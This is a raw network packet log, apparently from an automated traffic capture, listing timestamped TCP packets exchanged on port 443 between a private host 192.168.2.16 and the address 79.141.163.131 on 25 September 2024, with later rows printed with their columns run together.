Sep 25, 2024 19:02:13.870646954 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.870682955 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.870704889 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.872519016 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.872562885 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.872661114 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.872661114 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.872675896 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.873528957 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.873579025 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.873688936 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.873689890 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.873704910 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.873863935 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.874262094 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.874303102 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.874386072 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.874386072 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.874398947 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.874645948 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.874690056 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.874744892 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.874797106 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.874808073 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.874937057 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.874938011 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.875017881 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.875062943 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.875215054 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.875215054 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.875226974 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.875521898 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.875565052 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.875581026 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.875611067 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.875627041 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.875679970 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.875679970 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.876239061 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.876276970 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.876322985 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.876333952 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.876369953 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.876434088 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.956631899 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.956681967 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.956727982 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.956751108 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.956787109 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.956844091 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.959835052 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.959876060 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.960129976 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.960144043 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.960217953 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.962925911 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.962970018 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.963011980 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.963022947 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.963057995 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.963057995 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.965035915 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.965075970 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.965121984 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.965132952 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.965173006 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.965315104 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.965564966 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.965607882 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.965646982 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.965656996 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.965711117 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.966046095 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.966372013 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.966412067 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.966458082 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.966468096 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.966501951 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.967499971 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.968219995 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.968261957 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.968307018 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.968317986 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.968364000 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.968453884 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.970855951 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.970911980 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.970956087 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.970967054 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:13.970997095 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:13.971141100 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:14.043281078 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:14.043320894 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:14.043426037 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:14.043454885 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:14.043488026 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:14.043849945 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:14.046282053 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:14.046314001 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:14.046391010 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:14.046391010 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:14.046417952 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:14.046621084 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:14.049156904 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:14.049177885 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:14.049259901 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:14.049259901 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:14.049274921 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:14.049443960 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:14.051492929 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:14.051539898 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:14.051640034 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:14.051640034 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:14.051654100 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:14.052009106 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:14.052051067 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:14.052098036 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:14.052109957 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:14.052139044 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:14.052664042 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:14.052680969 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:14.052714109 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:14.052755117 CEST  49704        443        192.168.2.16    79.141.163.131
Sep 25, 2024 19:02:14.052771091 CEST  443          49704      79.141.163.131  192.168.2.16
Sep 25, 2024 19:02:14.052795887 CEST  49704        443        192.168.2.16    79.141.163.131
                                                                              Sep 25, 2024 19:02:14.052850962 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.054390907 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.054430962 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.054518938 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.054518938 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.054532051 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.056679964 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.057297945 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.057332039 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.057429075 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.057429075 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.057441950 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.057506084 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.129740953 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.129786015 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.129834890 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.129854918 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.129894018 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.130182981 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.132558107 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.132601976 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.132649899 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.132661104 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.132702112 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.133524895 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.135515928 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.135559082 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.135602951 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.135613918 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.135648966 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.135806084 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.138809919 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.138850927 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.138931036 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.138931990 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.138945103 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.139183998 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.139230967 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.139236927 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.139262915 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.139278889 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.139332056 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.139332056 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.139620066 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.139662027 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.139708996 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.139719963 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.139758110 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.139884949 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.140707970 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.140748024 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.140794039 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.140804052 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.140841007 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.140937090 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.143754959 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.143799067 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.143872976 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.143872976 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.143887043 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.144040108 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.216272116 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.216305017 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.216357946 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.216393948 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.216413021 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.216445923 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.218859911 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.218879938 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.218928099 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.218935966 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.218957901 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.219014883 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.221740007 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.221762896 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.221828938 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.221843004 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.221918106 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.224595070 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.224615097 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.224674940 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.224694967 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.224721909 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.224766970 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.225008011 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.225028038 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.225073099 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.225084066 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.225114107 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.225143909 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.225586891 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.225606918 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.225667953 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.225678921 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.225733995 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.227005959 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.227026939 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.227083921 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.227094889 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.227123976 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.227144003 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.229870081 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.229898930 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.229954004 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.229964972 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.230000019 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.230000019 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.310720921 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.310766935 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.310812950 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.310837030 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.310873032 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.310894012 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.311948061 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.311992884 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.312030077 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.312041044 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.312066078 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.312086105 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.312386990 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.312427998 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.312458038 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.312469959 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.312498093 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.312498093 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.312521935 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.312953949 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.312995911 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.313035965 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.313046932 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.313072920 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.313090086 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.313319921 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.313363075 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.313395023 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.313405037 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.313431978 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.313476086 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.313828945 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.313869953 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.313905001 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.313915968 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.313955069 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.313977957 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.315319061 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.315361977 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.315440893 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.315440893 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.315455914 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.315511942 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.317006111 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.317047119 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.317075968 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.317086935 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.317112923 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.317138910 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.397098064 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.397157907 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.397200108 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.397233009 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.397267103 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.397289038 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.398576021 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.398631096 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.398787975 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.398787975 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.398855925 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.398921013 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.399606943 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.399652004 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.399686098 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.399708986 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.399735928 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.399755001 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.400152922 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.400194883 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.400238037 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.400254011 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.400283098 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.400302887 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.400794983 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.400815010 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.400876999 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.400883913 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.400933027 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.401422977 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.401443005 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.502682924 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.502700090 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.515018940 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.586679935 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.586781979 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.586791992 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.586811066 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.586849928 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.586903095 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.587003946 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.587059975 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.587093115 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.587105036 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.587146997 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.587177038 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.587227106 CEST4434970579.141.163.131192.168.2.16
